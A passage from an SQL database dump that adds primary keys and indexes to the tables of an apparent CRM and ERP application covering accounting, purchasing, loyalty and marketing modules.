ALTER TABLE `tblacc_expense_category_mappings`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_item_automatics`
--
ALTER TABLE `tblacc_item_automatics`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_journal_entries`
--
ALTER TABLE `tblacc_journal_entries`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_matched_transactions`
--
ALTER TABLE `tblacc_matched_transactions`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_payment_mode_mappings`
--
ALTER TABLE `tblacc_payment_mode_mappings`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_plaid_transaction_logs`
--
ALTER TABLE `tblacc_plaid_transaction_logs`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_reconciles`
--
ALTER TABLE `tblacc_reconciles`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_tax_mappings`
--
ALTER TABLE `tblacc_tax_mappings`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_transaction_bankings`
--
ALTER TABLE `tblacc_transaction_bankings`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblacc_transfers`
--
ALTER TABLE `tblacc_transfers`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblactivity_log`
--
ALTER TABLE `tblactivity_log`
  ADD PRIMARY KEY (`id`),
  ADD KEY `staffid` (`staffid`);

--
-- Indexes for table `tblallowance_type`
--
ALTER TABLE `tblallowance_type`
  ADD PRIMARY KEY (`type_id`);

--
-- Indexes for table `tblannouncements`
--
ALTER TABLE `tblannouncements`
  ADD PRIMARY KEY (`announcementid`);

--
-- Indexes for table `tblapplicable_staff`
--
ALTER TABLE `tblapplicable_staff`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblappointly_appointments`
--
ALTER TABLE `tblappointly_appointments`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblappointly_appointment_types`
--
ALTER TABLE `tblappointly_appointment_types`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblappointly_callbacks`
--
ALTER TABLE `tblappointly_callbacks`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblappointly_callbacks_assignees`
--
ALTER TABLE `tblappointly_callbacks_assignees`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblappointly_google`
--
ALTER TABLE `tblappointly_google`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcart`
--
ALTER TABLE `tblcart`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcart_detailt`
--
ALTER TABLE `tblcart_detailt`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblclients`
--
ALTER TABLE `tblclients`
  ADD PRIMARY KEY (`userid`),
  ADD KEY `country` (`country`),
  ADD KEY `leadid` (`leadid`),
  ADD KEY `company` (`company`),
  ADD KEY `active` (`active`);

--
-- Indexes for table `tblcommission`
--
ALTER TABLE `tblcommission`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcommission_hierarchy`
--
ALTER TABLE `tblcommission_hierarchy`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcommission_policy`
--
ALTER TABLE `tblcommission_policy`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcommission_receipt`
--
ALTER TABLE `tblcommission_receipt`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcommission_receipt_detail`
--
ALTER TABLE `tblcommission_receipt_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcommission_salesadmin_group`
--
ALTER TABLE `tblcommission_salesadmin_group`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblconsents`
--
ALTER TABLE `tblconsents`
  ADD PRIMARY KEY (`id`),
  ADD KEY `purpose_id` (`purpose_id`),
  ADD KEY `contact_id` (`contact_id`),
  ADD KEY `lead_id` (`lead_id`);

--
-- Indexes for table `tblconsent_purposes`
--
ALTER TABLE `tblconsent_purposes`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcontacts`
--
ALTER TABLE `tblcontacts`
  ADD PRIMARY KEY (`id`),
  ADD KEY `userid` (`userid`),
  ADD KEY `firstname` (`firstname`),
  ADD KEY `lastname` (`lastname`),
  ADD KEY `email` (`email`),
  ADD KEY `is_primary` (`is_primary`);

--
-- Indexes for table `tblcontact_permissions`
--
ALTER TABLE `tblcontact_permissions`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcontracts`
--
ALTER TABLE `tblcontracts`
  ADD PRIMARY KEY (`id`),
  ADD KEY `client` (`client`),
  ADD KEY `contract_type` (`contract_type`);

--
-- Indexes for table `tblcontracts_types`
--
ALTER TABLE `tblcontracts_types`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcontract_comments`
--
ALTER TABLE `tblcontract_comments`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcontract_renewals`
--
ALTER TABLE `tblcontract_renewals`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcountries`
--
ALTER TABLE `tblcountries`
  ADD PRIMARY KEY (`country_id`);

--
-- Indexes for table `tblcreditnotes`
--
ALTER TABLE `tblcreditnotes`
  ADD PRIMARY KEY (`id`),
  ADD KEY `currency` (`currency`),
  ADD KEY `clientid` (`clientid`),
  ADD KEY `project_id` (`project_id`);

--
-- Indexes for table `tblcreditnote_refunds`
--
ALTER TABLE `tblcreditnote_refunds`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcredits`
--
ALTER TABLE `tblcredits`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcurrencies`
--
ALTER TABLE `tblcurrencies`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcurrency_rates`
--
ALTER TABLE `tblcurrency_rates`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcurrency_rate_logs`
--
ALTER TABLE `tblcurrency_rate_logs`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcustomers_groups`
--
ALTER TABLE `tblcustomers_groups`
  ADD PRIMARY KEY (`id`),
  ADD KEY `name` (`name`);

--
-- Indexes for table `tblcustomer_admins`
--
ALTER TABLE `tblcustomer_admins`
  ADD KEY `customer_id` (`customer_id`),
  ADD KEY `staff_id` (`staff_id`);

--
-- Indexes for table `tblcustomer_groups`
--
ALTER TABLE `tblcustomer_groups`
  ADD PRIMARY KEY (`id`),
  ADD KEY `groupid` (`groupid`),
  ADD KEY `customer_id` (`customer_id`);

--
-- Indexes for table `tblcustomfields`
--
ALTER TABLE `tblcustomfields`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblcustomfieldsvalues`
--
ALTER TABLE `tblcustomfieldsvalues`
  ADD PRIMARY KEY (`id`),
  ADD KEY `relid` (`relid`),
  ADD KEY `fieldto` (`fieldto`),
  ADD KEY `fieldid` (`fieldid`);

--
-- Indexes for table `tblday_off`
--
ALTER TABLE `tblday_off`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbldepartments`
--
ALTER TABLE `tbldepartments`
  ADD PRIMARY KEY (`departmentid`),
  ADD KEY `name` (`name`);

--
-- Indexes for table `tbldismissed_announcements`
--
ALTER TABLE `tbldismissed_announcements`
  ADD PRIMARY KEY (`dismissedannouncementid`),
  ADD KEY `announcementid` (`announcementid`),
  ADD KEY `staff` (`staff`),
  ADD KEY `userid` (`userid`);

--
-- Indexes for table `tblemaillists`
--
ALTER TABLE `tblemaillists`
  ADD PRIMARY KEY (`listid`);

--
-- Indexes for table `tblemailtemplates`
--
ALTER TABLE `tblemailtemplates`
  ADD PRIMARY KEY (`emailtemplateid`);

--
-- Indexes for table `tblestimates`
--
ALTER TABLE `tblestimates`
  ADD PRIMARY KEY (`id`),
  ADD KEY `clientid` (`clientid`),
  ADD KEY `currency` (`currency`),
  ADD KEY `project_id` (`project_id`),
  ADD KEY `sale_agent` (`sale_agent`),
  ADD KEY `status` (`status`);

--
-- Indexes for table `tblestimate_requests`
--
ALTER TABLE `tblestimate_requests`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblestimate_request_forms`
--
ALTER TABLE `tblestimate_request_forms`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblestimate_request_status`
--
ALTER TABLE `tblestimate_request_status`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblevents`
--
ALTER TABLE `tblevents`
  ADD PRIMARY KEY (`eventid`);

--
-- Indexes for table `tblexpenses`
--
ALTER TABLE `tblexpenses`
  ADD PRIMARY KEY (`id`),
  ADD KEY `clientid` (`clientid`),
  ADD KEY `project_id` (`project_id`),
  ADD KEY `category` (`category`),
  ADD KEY `currency` (`currency`);

--
-- Indexes for table `tblexpenses_categories`
--
ALTER TABLE `tblexpenses_categories`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblfiles`
--
ALTER TABLE `tblfiles`
  ADD PRIMARY KEY (`id`),
  ADD KEY `rel_id` (`rel_id`),
  ADD KEY `rel_type` (`rel_type`);

--
-- Indexes for table `tblfilters`
--
ALTER TABLE `tblfilters`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblform_questions`
--
ALTER TABLE `tblform_questions`
  ADD PRIMARY KEY (`questionid`);

--
-- Indexes for table `tblform_question_box`
--
ALTER TABLE `tblform_question_box`
  ADD PRIMARY KEY (`boxid`);

--
-- Indexes for table `tblform_question_box_description`
--
ALTER TABLE `tblform_question_box_description`
  ADD PRIMARY KEY (`questionboxdescriptionid`);

--
-- Indexes for table `tblform_results`
--
ALTER TABLE `tblform_results`
  ADD PRIMARY KEY (`resultid`);

--
-- Indexes for table `tblgdpr_requests`
--
ALTER TABLE `tblgdpr_requests`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblgoals`
--
ALTER TABLE `tblgoals`
  ADD PRIMARY KEY (`id`),
  ADD KEY `staff_id` (`staff_id`);

--
-- Indexes for table `tblgoods_delivery`
--
ALTER TABLE `tblgoods_delivery`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblgoods_delivery_detail`
--
ALTER TABLE `tblgoods_delivery_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblgoods_delivery_invoices_pr_orders`
--
ALTER TABLE `tblgoods_delivery_invoices_pr_orders`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblgoods_receipt`
--
ALTER TABLE `tblgoods_receipt`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblgoods_receipt_detail`
--
ALTER TABLE `tblgoods_receipt_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblgoods_transaction_detail`
--
ALTER TABLE `tblgoods_transaction_detail`
  ADD PRIMARY KEY (`id`,`commodity_id`);

--
-- Indexes for table `tblhrm_option`
--
ALTER TABLE `tblhrm_option`
  ADD PRIMARY KEY (`option_id`);

--
-- Indexes for table `tblhrm_timesheet`
--
ALTER TABLE `tblhrm_timesheet`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblinsurance_type`
--
ALTER TABLE `tblinsurance_type`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblinternal_delivery_note`
--
ALTER TABLE `tblinternal_delivery_note`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblinternal_delivery_note_detail`
--
ALTER TABLE `tblinternal_delivery_note_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblinventory_commodity_min`
--
ALTER TABLE `tblinventory_commodity_min`
  ADD PRIMARY KEY (`id`,`commodity_id`);

--
-- Indexes for table `tblinventory_manage`
--
ALTER TABLE `tblinventory_manage`
  ADD PRIMARY KEY (`id`,`commodity_id`,`warehouse_id`);

--
-- Indexes for table `tblinvoicepaymentrecords`
--
ALTER TABLE `tblinvoicepaymentrecords`
  ADD PRIMARY KEY (`id`),
  ADD KEY `invoiceid` (`invoiceid`),
  ADD KEY `paymentmethod` (`paymentmethod`);

--
-- Indexes for table `tblinvoices`
--
ALTER TABLE `tblinvoices`
  ADD PRIMARY KEY (`id`),
  ADD KEY `currency` (`currency`),
  ADD KEY `clientid` (`clientid`),
  ADD KEY `project_id` (`project_id`),
  ADD KEY `sale_agent` (`sale_agent`),
  ADD KEY `total` (`total`),
  ADD KEY `status` (`status`);

--
-- Indexes for table `tblitemable`
--
ALTER TABLE `tblitemable`
  ADD PRIMARY KEY (`id`),
  ADD KEY `rel_id` (`rel_id`),
  ADD KEY `rel_type` (`rel_type`),
  ADD KEY `qty` (`qty`),
  ADD KEY `rate` (`rate`);

--
-- Indexes for table `tblitems`
--
ALTER TABLE `tblitems`
  ADD PRIMARY KEY (`id`),
  ADD KEY `tax` (`tax`),
  ADD KEY `tax2` (`tax2`),
  ADD KEY `group_id` (`group_id`);

--
-- Indexes for table `tblitems_groups`
--
ALTER TABLE `tblitems_groups`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblitems_of_vendor`
--
ALTER TABLE `tblitems_of_vendor`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblitem_tax`
--
ALTER TABLE `tblitem_tax`
  ADD PRIMARY KEY (`id`),
  ADD KEY `itemid` (`itemid`),
  ADD KEY `rel_id` (`rel_id`);

--
-- Indexes for table `tbljob_position`
--
ALTER TABLE `tbljob_position`
  ADD PRIMARY KEY (`position_id`);

--
-- Indexes for table `tblknowedge_base_article_feedback`
--
ALTER TABLE `tblknowedge_base_article_feedback`
  ADD PRIMARY KEY (`articleanswerid`);

--
-- Indexes for table `tblknowledge_base`
--
ALTER TABLE `tblknowledge_base`
  ADD PRIMARY KEY (`articleid`);

--
-- Indexes for table `tblknowledge_base_groups`
--
ALTER TABLE `tblknowledge_base_groups`
  ADD PRIMARY KEY (`groupid`);

--
-- Indexes for table `tblleads`
--
ALTER TABLE `tblleads`
  ADD PRIMARY KEY (`id`),
  ADD KEY `name` (`name`),
  ADD KEY `company` (`company`),
  ADD KEY `email` (`email`),
  ADD KEY `assigned` (`assigned`),
  ADD KEY `status` (`status`),
  ADD KEY `source` (`source`),
  ADD KEY `lastcontact` (`lastcontact`),
  ADD KEY `dateadded` (`dateadded`),
  ADD KEY `leadorder` (`leadorder`),
  ADD KEY `from_form_id` (`from_form_id`);

--
-- Indexes for table `tblleads_email_integration`
--
ALTER TABLE `tblleads_email_integration`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblleads_sources`
--
ALTER TABLE `tblleads_sources`
  ADD PRIMARY KEY (`id`),
  ADD KEY `name` (`name`);

--
-- Indexes for table `tblleads_status`
--
ALTER TABLE `tblleads_status`
  ADD PRIMARY KEY (`id`),
  ADD KEY `name` (`name`);

--
-- Indexes for table `tbllead_activity_log`
--
ALTER TABLE `tbllead_activity_log`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbllead_integration_emails`
--
ALTER TABLE `tbllead_integration_emails`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbllistemails`
--
ALTER TABLE `tbllistemails`
  ADD PRIMARY KEY (`emailid`);

--
-- Indexes for table `tbllist_widget`
--
ALTER TABLE `tbllist_widget`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblloy_card`
--
ALTER TABLE `tblloy_card`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblloy_mbs_program`
--
ALTER TABLE `tblloy_mbs_program`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblloy_mbs_rule`
--
ALTER TABLE `tblloy_mbs_rule`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblloy_program_detail`
--
ALTER TABLE `tblloy_program_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblloy_program_discount_log`
--
ALTER TABLE `tblloy_program_discount_log`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblloy_redeem_log`
--
ALTER TABLE `tblloy_redeem_log`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblloy_redemp_detail`
--
ALTER TABLE `tblloy_redemp_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblloy_rule`
--
ALTER TABLE `tblloy_rule`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblloy_rule_detail`
--
ALTER TABLE `tblloy_rule_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblloy_transation`
--
ALTER TABLE `tblloy_transation`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblloy_voucher_inv_log`
--
ALTER TABLE `tblloy_voucher_inv_log`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblmaillistscustomfields`
--
ALTER TABLE `tblmaillistscustomfields`
  ADD PRIMARY KEY (`customfieldid`);

--
-- Indexes for table `tblmaillistscustomfieldvalues`
--
ALTER TABLE `tblmaillistscustomfieldvalues`
  ADD PRIMARY KEY (`customfieldvalueid`),
  ADD KEY `listid` (`listid`),
  ADD KEY `customfieldid` (`customfieldid`);

--
-- Indexes for table `tblmail_queue`
--
ALTER TABLE `tblmail_queue`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblmanage_leave`
--
ALTER TABLE `tblmanage_leave`
  ADD PRIMARY KEY (`leave_id`);

--
-- Indexes for table `tblma_assets`
--
ALTER TABLE `tblma_assets`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_asset_download_logs`
--
ALTER TABLE `tblma_asset_download_logs`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_campaigns`
--
ALTER TABLE `tblma_campaigns`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_campaign_flows`
--
ALTER TABLE `tblma_campaign_flows`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_campaign_lead_exceptions`
--
ALTER TABLE `tblma_campaign_lead_exceptions`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_categories`
--
ALTER TABLE `tblma_categories`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_emails`
--
ALTER TABLE `tblma_emails`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_email_click_logs`
--
ALTER TABLE `tblma_email_click_logs`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_email_logs`
--
ALTER TABLE `tblma_email_logs`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_email_templates`
--
ALTER TABLE `tblma_email_templates`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_forms`
--
ALTER TABLE `tblma_forms`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_lead_segments`
--
ALTER TABLE `tblma_lead_segments`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_lead_stages`
--
ALTER TABLE `tblma_lead_stages`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_marketing_messages`
--
ALTER TABLE `tblma_marketing_messages`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_point_actions`
--
ALTER TABLE `tblma_point_actions`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_point_action_logs`
--
ALTER TABLE `tblma_point_action_logs`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_point_triggers`
--
ALTER TABLE `tblma_point_triggers`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_segments`
--
ALTER TABLE `tblma_segments`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_segment_filters`
--
ALTER TABLE `tblma_segment_filters`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_sms`
--
ALTER TABLE `tblma_sms`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_sms_logs`
--
ALTER TABLE `tblma_sms_logs`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_stages`
--
ALTER TABLE `tblma_stages`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblma_text_messages`
--
ALTER TABLE `tblma_text_messages`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblmilestones`
--
ALTER TABLE `tblmilestones`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblmodules`
--
ALTER TABLE `tblmodules`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblnewsfeed_comment_likes`
--
ALTER TABLE `tblnewsfeed_comment_likes`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblnewsfeed_posts`
--
ALTER TABLE `tblnewsfeed_posts`
  ADD PRIMARY KEY (`postid`);

--
-- Indexes for table `tblnewsfeed_post_comments`
--
ALTER TABLE `tblnewsfeed_post_comments`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblnewsfeed_post_likes`
--
ALTER TABLE `tblnewsfeed_post_likes`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblnotes`
--
ALTER TABLE `tblnotes`
  ADD PRIMARY KEY (`id`),
  ADD KEY `rel_id` (`rel_id`),
  ADD KEY `rel_type` (`rel_type`);

--
-- Indexes for table `tblnotifications`
--
ALTER TABLE `tblnotifications`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_cart_payment`
--
ALTER TABLE `tblomni_cart_payment`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_create_customer_report`
--
ALTER TABLE `tblomni_create_customer_report`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_create_customer_report_detail`
--
ALTER TABLE `tblomni_create_customer_report_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_customer_report`
--
ALTER TABLE `tblomni_customer_report`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_log_discount`
--
ALTER TABLE `tblomni_log_discount`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_log_sync_woo`
--
ALTER TABLE `tblomni_log_sync_woo`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_master_channel_woocommere`
--
ALTER TABLE `tblomni_master_channel_woocommere`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_pre_order_product_setting`
--
ALTER TABLE `tblomni_pre_order_product_setting`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_refunds`
--
ALTER TABLE `tblomni_refunds`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_setting_woo_store`
--
ALTER TABLE `tblomni_setting_woo_store`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_shift`
--
ALTER TABLE `tblomni_shift`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_shift_history`
--
ALTER TABLE `tblomni_shift_history`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblomni_trade_discount`
--
ALTER TABLE `tblomni_trade_discount`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tbloptions`
--
ALTER TABLE `tbloptions`
  ADD PRIMARY KEY (`id`),
  ADD KEY `name` (`name`);

--
-- Indexes for table `tblpayment_attempts`
--
ALTER TABLE `tblpayment_attempts`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpayment_modes`
--
ALTER TABLE `tblpayment_modes`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpayroll_table`
--
ALTER TABLE `tblpayroll_table`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpayroll_type`
--
ALTER TABLE `tblpayroll_type`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpinned_projects`
--
ALTER TABLE `tblpinned_projects`
  ADD PRIMARY KEY (`id`),
  ADD KEY `project_id` (`project_id`);

--
-- Indexes for table `tblprojectdiscussioncomments`
--
ALTER TABLE `tblprojectdiscussioncomments`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblprojectdiscussions`
--
ALTER TABLE `tblprojectdiscussions`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblprojects`
--
ALTER TABLE `tblprojects`
  ADD PRIMARY KEY (`id`),
  ADD KEY `clientid` (`clientid`),
  ADD KEY `name` (`name`);

--
-- Indexes for table `tblproject_activity`
--
ALTER TABLE `tblproject_activity`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblproject_files`
--
ALTER TABLE `tblproject_files`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblproject_members`
--
ALTER TABLE `tblproject_members`
  ADD PRIMARY KEY (`id`),
  ADD KEY `project_id` (`project_id`),
  ADD KEY `staff_id` (`staff_id`);

--
-- Indexes for table `tblproject_notes`
--
ALTER TABLE `tblproject_notes`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblproject_settings`
--
ALTER TABLE `tblproject_settings`
  ADD PRIMARY KEY (`id`),
  ADD KEY `project_id` (`project_id`);

--
-- Indexes for table `tblproposals`
--
ALTER TABLE `tblproposals`
  ADD PRIMARY KEY (`id`),
  ADD KEY `status` (`status`);

--
-- Indexes for table `tblproposal_comments`
--
ALTER TABLE `tblproposal_comments`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblprovince_city`
--
ALTER TABLE `tblprovince_city`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpurchase_option`
--
ALTER TABLE `tblpurchase_option`
  ADD PRIMARY KEY (`option_id`);

--
-- Indexes for table `tblpur_activity_log`
--
ALTER TABLE `tblpur_activity_log`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_approval_details`
--
ALTER TABLE `tblpur_approval_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_approval_setting`
--
ALTER TABLE `tblpur_approval_setting`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_comments`
--
ALTER TABLE `tblpur_comments`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_contacts`
--
ALTER TABLE `tblpur_contacts`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_contracts`
--
ALTER TABLE `tblpur_contracts`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_debits`
--
ALTER TABLE `tblpur_debits`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_debits_refunds`
--
ALTER TABLE `tblpur_debits_refunds`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_debit_notes`
--
ALTER TABLE `tblpur_debit_notes`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_estimates`
--
ALTER TABLE `tblpur_estimates`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_estimate_detail`
--
ALTER TABLE `tblpur_estimate_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_invoices`
--
ALTER TABLE `tblpur_invoices`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_invoice_details`
--
ALTER TABLE `tblpur_invoice_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_invoice_payment`
--
ALTER TABLE `tblpur_invoice_payment`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_orders`
--
ALTER TABLE `tblpur_orders`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_order_detail`
--
ALTER TABLE `tblpur_order_detail`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_order_payment`
--
ALTER TABLE `tblpur_order_payment`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_request`
--
ALTER TABLE `tblpur_request`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_request_detail`
--
ALTER TABLE `tblpur_request_detail`
  ADD PRIMARY KEY (`prd_id`);

--
-- Indexes for table `tblpur_unit`
--
ALTER TABLE `tblpur_unit`
  ADD PRIMARY KEY (`unit_id`);

--
-- Indexes for table `tblpur_vendor`
--
ALTER TABLE `tblpur_vendor`
  ADD PRIMARY KEY (`userid`);

--
-- Indexes for table `tblpur_vendor_cate`
--
ALTER TABLE `tblpur_vendor_cate`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblpur_vendor_items`
--
ALTER TABLE `tblpur_vendor_items`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblrelated_items`
--
ALTER TABLE `tblrelated_items`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblreminders`
--
ALTER TABLE `tblreminders`
  ADD PRIMARY KEY (`id`),
  ADD KEY `rel_id` (`rel_id`),
  ADD KEY `rel_type` (`rel_type`),
  ADD KEY `staff` (`staff`);

--
-- Indexes for table `tblreminder_activity`
--
ALTER TABLE `tblreminder_activity`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblreminder_services`
--
ALTER TABLE `tblreminder_services`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblreminder_service_value`
--
ALTER TABLE `tblreminder_service_value`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblrequest`
--
ALTER TABLE `tblrequest`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblrequest_approval_details`
--
ALTER TABLE `tblrequest_approval_details`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblrequest_files`
--
ALTER TABLE `tblrequest_files`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblrequest_follow`
--
ALTER TABLE `tblrequest_follow`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblrequest_form`
--
ALTER TABLE `tblrequest_form`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblrequest_log`
--
ALTER TABLE `tblrequest_log`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblrequest_related`
--
ALTER TABLE `tblrequest_related`
  ADD PRIMARY KEY (`id`);

--
-- Indexes for table `tblrequest_type`
--
